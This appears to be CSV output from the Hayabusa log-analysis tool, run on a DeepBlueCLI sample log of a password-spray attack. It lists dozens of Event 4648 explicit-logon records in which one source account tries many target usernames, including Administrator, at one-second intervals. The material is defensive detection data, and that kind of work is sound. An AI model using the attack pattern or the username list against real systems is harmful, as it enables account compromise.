DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : 